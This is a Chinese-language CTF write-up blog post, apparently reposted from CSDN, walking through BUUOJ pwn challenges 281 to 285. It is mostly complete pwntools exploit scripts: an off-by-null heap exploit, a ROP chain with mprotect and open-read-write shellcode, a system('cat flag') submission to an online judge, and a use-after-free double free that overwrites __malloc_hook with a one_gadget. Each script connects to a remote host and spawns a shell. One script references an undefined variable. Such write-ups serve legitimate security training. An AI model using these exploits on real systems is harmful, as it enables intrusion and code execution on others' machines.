标签:p64 libc writeup random game sendlineafter Pwn 285 delete
281 ciscn_2019_final_6
storage game里面有个输入函数
显然有个off by null。
exp
#coding:utf8
from pwn import*
r = remote('node4.buuoj.cn',26021)
libc = ELF('./64/libc-2.27.so')
def resume():
r.sendlineafter('>','0')
def new_game():
r.sendlineafter('>','1')
r.sendlineafter("what's your name?","aaaa")
r.sendlineafter('input you ops count','0')
def load_game(index):
r.sendlineafter('>','2')
r.sendlineafter('index?',str(index))
def store_game(size = 0,comment = ''):
r.sendlineafter('>','3')
if size == 0:
r.sendafter('any comment?','N')
else:
r.sendafter('any comment?','Y')
r.sendlineafter('comment size?',str(size))
r.sendafter('plz input comment',comment)
def delete_record(index):
r.sendlineafter('>','4')
r.sendlineafter('index?',str(index))
def show_record():
r.sendlineafter('>','5')
new_game()
store_game(0xF0,'a'*0xF0)
new_game()
store_game()
new_game()
store_game(0xF0,'a'*0xF0)
for i in range(7):
new_game()
store_game(0xF0,'a'*0xF0)
new_game()
store_game()
new_game()
store_game()
new_game()
store_game()
for i in range(3,10):
delete_record(i)
delete_record(0)
delete_record(2)
for i in range(7):
new_game()
store_game(0xF0,'a'*0xF0)
delete_record(10)
new_game()
store_game(0xF0,'a'*0xF0)
delete_record(11)
new_game()
store_game(0xF0,'a'*0xF0)
delete_record(12)
new_game()
store_game(0x18,'a'*0x10 + p64(0x100 + 0x20 + 0x30 + 0x20 + 0x30))
delete_record(0)
for i in range(2,8):
delete_record(i)
delete_record(9)
delete_record(8)
for i in range(7):
new_game()
store_game(0xF0,'a'*0xF0)
new_game()
store_game(0xF0,'a'*0xF0)
load_game(1)
r.recvuntil('X:')
main_arena_xx = int(r.recvuntil(',',drop = True))
r.recvuntil('Y:')
main_arena_xx = main_arena_xx + (int(r.recvuntil(';',drop = True)) << 32)
sh.sendlineafter('input you ops count','0')
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook']& 0xFFF)
libc_base = malloc_hook_addr - libc.sym['__malloc_hook']
free_hook_addr = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
new_game()
store_game(0x60,'/bin/sh'.ljust(0x40,'\x00') + p64(0) + p64(0x31) + p64(free_hook_addr) + '\n')
new_game()
store_game(0x20,p64(system_addr) + '\n')
delete_record(9)
r.interactive()
282 [OGeek2019]hub
只有nc,连文件都没有。
搜了搜之前是有文件的,那拉到。
283 roarctf_2019_easyrop
首先是刚开始有个输入,感觉这里似乎有个溢出。
然后进入一个if else
先分析401678这个函数。
我们的输入应该是个文件名
进来之后首先是个__xstat函数。
这个函数能获取文件的各种属性,所以外面我们会看到stat_buf.xxxxx。那个就是文件的各种属性。
__xstat返回的其实是文件的stat结构体,里面会记录文件的类型和权限。
会用结构体里面的mode出来进行判断
stat结构体的mode
大佬博客
主要是判断前四位是不是1000,是不是0100.
但是其实不可能是1000,因为文件类型只有三种,但是也不重要,因为我们如果输入的文件路径有问题,就会返回0,就会直接跑到下面的沙箱部分,所以我们就随便输入,让它出错返回0,然后就是以恶个有沙箱的rop。
我们先泄露地址,然后通过mprotect改了权限然后orw就可以了。
exp
# -*- coding:utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.arch = "amd64"
context.os = "linux"
r = remote('node4.buuoj.cn', 26263)
#r = process("./283")
elf = ELF('./283')
libc = ELF("./64/libc-2.27.so")
payload = 'a' * 0x418 + p8(0x28)
payload += p64(0x401b93) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(0x4019f3)
r.sendlineafter('>> ', payload)
libc_base = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.symbols['puts']
print hex(libc_base)
payload = 'a' * 0x418 + p8(0x28)
payload += p64(0x401b93) + p64(elf.bss())
payload += p64(libc_base + libc.sym['gets'])
payload += p64(0x401b93) + p64(elf.bss() & 0xfffffffffffff000)
payload += p64(libc_base + 0x23e6a) + p64(0x1000)
payload += p64(libc_base + 0x1b96)
payload += p64(7) + p64(libc_base + libc.sym['mprotect']) + p64(elf.bss())
r.sendlineafter('>> ', payload)
shellcode = asm('''
mov rax, 0x67616c662f2e
push rax
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall
cmp eax, 0
jg next
push 1
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall
jmp exit
next:
mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall
mov edx, eax
mov edi, 1
mov rsi, rsp
mov eax, edi
syscall
exit:
xor edi, edi
mov eax, 231
syscall
''')
r.sendline(shellcode)
r.interactive()
284 de1ctf_2019_a+b
给的是一个dockerfile。
dockerfile应该是网站的,我们可以直接登上哪个网站看看。
可以提交点啥。
得打开server.py审计一下。
#! /bin/python
from flask import Flask,render_template,request
import uuid
import os
import lorun
import multiprocessing
app = Flask(__name__)
RESULT_STR = [
'Accepted',
'Presentation Error',
'Time Limit Exceeded',
'Memory Limit Exceeded',
'Wrong Answer',
'Runtime Error',
'Output Limit Exceeded',
'Compile Error',
'System Error'
]
def compile_binary(random_prefix):
os.system('gcc %s.c -o %s_prog'%(random_prefix,random_prefix))
@app.route("/judge",methods=['POST'])
def judge():
try:
random_prefix = uuid.uuid1().hex
random_src = random_prefix + '.c'
random_prog = random_prefix + '_prog'
random_output = random_prefix + '.out'
if 'code' not in request.form:
return 'code not exists!'
#write into file
with open(random_src,'w') as f:
f.write(request.form['code'])
#compile
process = multiprocessing.Process(target=compile_binary,args=(random_prefix,))
process.start()
process.join(1)
if process.is_alive():
process.terminate()
return 'compile error!'
if not os.path.exists(random_prefix+'_prog'):
os.remove(random_src)
return 'compile error!'
fin = open('a+b.in','r')
ftemp = open(random_output, 'w')
runcfg = {
'args':['./'+random_prog],
'fd_in':fin.fileno(),
'fd_out':ftemp.fileno(),
'timelimit':1000,
'memorylimit':200000,
'trace':True,
'calls':[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 21, 25, 56, 63, 78, 79, 87, 89, 97, 102, 158, 186, 202, 218, 219, 231, 234, 273],
'files':{
"/etc/ld.so.cache":524288,
"/lib/x86_64-linux-gnu/libc.so.6":524288,
"/lib/x86_64-linux-gnu/libm.so.6":524288,
"/usr/lib/x86_64-linux-gnu/libstdc++.so.6":524288,
"/lib/x86_64-linux-gnu/libgcc_s.so.1":524288,
"/lib/x86_64-linux-gnu/libpthread.so.0":524288,
"/etc/localtime":524288
}
}
rst = lorun.run(runcfg)
fin.close()
ftemp.close()
os.remove(random_prog)
os.remove(random_src)
if rst['result'] == 0:
ftemp = open(random_output,'r')
fout = open('a+b.out','r')
crst = lorun.check(fout.fileno() , ftemp.fileno())
fout.seek(0)
ftemp.seek(0)
standard_output = fout.read()
test_output = ftemp.read()
fout.close()
ftemp.close()
if crst != 0:
msg = RESULT_STR[crst] +'<br/>'
msg += 'standard output:<br/>'
msg += standard_output +'<br/>'
msg += 'your output:<br/>'
msg += test_output
os.remove(random_output)
return msg
os.remove(random_output)
return RESULT_STR[rst['result']]
except Exception as e:
if os.path.exists(random_prog):
os.remove(random_prog)
if os.path.exists(random_src):
os.remove(random_src)
return 'ERROR! '+str(e)
return 'ERROR!'
@app.route("/")
def hello():
return render_template('index.html')
if __name__ == '__main__':
app.run(host='0.0.0.0',port=11111)
你可以看到首先我们输入一个c代码,然后回gcc编译一下然后跑一下……
那直接system不就好了……
#include <stdlib.h>
#include <stdio.h>
int main(void)
{
system("cat flag");
return 0;
}
285 starctf2019_girlfriend
双层结构。
show
没有edit
free
显然有uaf。
exp
from pwn import *
context.log_level = "debug"
p=remote('node4.buuoj.cn',28575)
#p = process("./285")
elf=ELF('./285')
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
libc = ELF("./64/libc-2.27.so")
def add(size,call):
p.sendlineafter(':','1')
p.sendlineafter('name',str(size))
p.sendlineafter('name:',call)
p.sendlineafter('call:',"1111")
def show(idx):
p.sendlineafter(':','2')
p.sendlineafter('index:',str(idx))
def edit():
p.sendlineafter(':','3')
def delete(idx):
p.sendlineafter(':','4')
p.sendlineafter('index:',str(idx))
add(0x450, '0')
add(0x10, '1')
delete(0)
show(0)
malloc_hook = (u64(p.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
system_addr = libc_base + libc.sym["system"]
one_gadget = libc_base + 0x10a38c
print "libc_base = " + hex(libc_base)
for i in xrange(7 + 1 + 2):
add(0x68, str(i))
for i in xrange(7 + 1):
delete(i + 1)
delete(9)
delete(10)
delete(9)
for i in xrange(7):
add(0x68, str(i))
add(0x68, p64(malloc_hook - 0x13))
add(0x68, 'x')
add(0x68, 'x')
add(0x68, '\x00' * 0xb+p64(one_gadget)+p64(realloc+6))
p.sendlineafter("choice:", "1")
p.sendline("cat flag")
p.interactive()
标签:p64,libc,writeup,random,game,sendlineafter,Pwn,285,delete 来源: https://blog.csdn.net/yongbaoii/article/details/119815098
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。